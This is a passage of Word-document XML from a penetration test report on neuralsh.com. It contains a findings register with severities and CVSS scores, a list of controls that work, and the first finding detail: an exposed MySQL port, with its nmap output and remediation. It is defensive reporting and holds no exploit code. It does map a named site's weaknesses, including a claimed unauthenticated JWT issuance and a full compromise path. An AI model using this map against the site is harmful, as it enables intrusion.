              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Webmail Interface Exposed (Port 2096)</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N-018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Additional cPanel Interfaces Exposed (2078, 2091)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7.5</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N-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>API Routes Exposed in Client-Side JavaScript</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N-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Unauthenticated JWT Token Issuance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 xml:space="preserve">Confirmed + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SSL Certificate Mismatch (Backend Server)</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5.9</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N-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CSP Allows unsafe-inline Scripts</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5.4</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N-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Wildcard DNS Configured</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4.3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N-016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Directory Listing Enabled on Apache</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5.3</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N-020</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Shared Hosting Co-Tenant: onesala.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>6.1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N-011</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Information Disclosure via Error Messages</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3.7</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N-012</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SPF Softfail / DMARC Quarantine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N-017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>cPanel Version Disclosure</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3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-019</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SMTP Port 25 Transitioned from Filtered to Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 10: Complete findings register — neuralsh.com VAPT engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.2 Severity Distribution and Risk Scoring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Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Percentage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Average CVSS</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9.68</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>25%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7.82</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7</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5.37</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>20</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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>6.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 11: Severity distribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The average CVSS score of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> places the overall risk posture at the High-Medium boundary. The four Critical findings collectively represent a complete server compromise path available to any unauthenticated attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The following positive security controls were also identified during the assessment — these represent existing investments that are functioning correctly:</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Control</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Cloudflare WAF on main site</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Active — blocks automated scanners</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>HSTS with preload (max-age=15552000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Enforced — prevents SSL stripping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>X-Frame-Options: DENY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Active — prevents clickjacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>X-Content-Type-Options: nosniff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Active — prevents MIME confusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>TLS 1.0 and 1.1 disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Only TLS 1.2 and 1.3 accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>JWT uses UUID for tid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Token IDs are not sequential or predictable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>alg:none JWT attack blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>JWT validation is implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Zone transfer blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS zone is not publicly exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 12: Positive security controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.3 Finding Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Each finding is presented in a standardised format: a summary table showing severity, CVSS score, affected host, and tool used; a description of the vulnerability and its impact; a remediation recommendation; and an evidence reference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-001: MySQL Port 3306 Exposed to Internet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103.16.xx.xxx:3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nmap, mysql-client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3306 is open to the internet, allowing direct authentication attempts against MySQL without going through the web application. Successful credential guessing grants full read and write access to all databases, including user records, session data, and API secrets.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Restrict port 3306 to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a trusted VPN only. Database ports must never be internet-facing.</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3306/tcp open mysql MySQL 8.0.43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
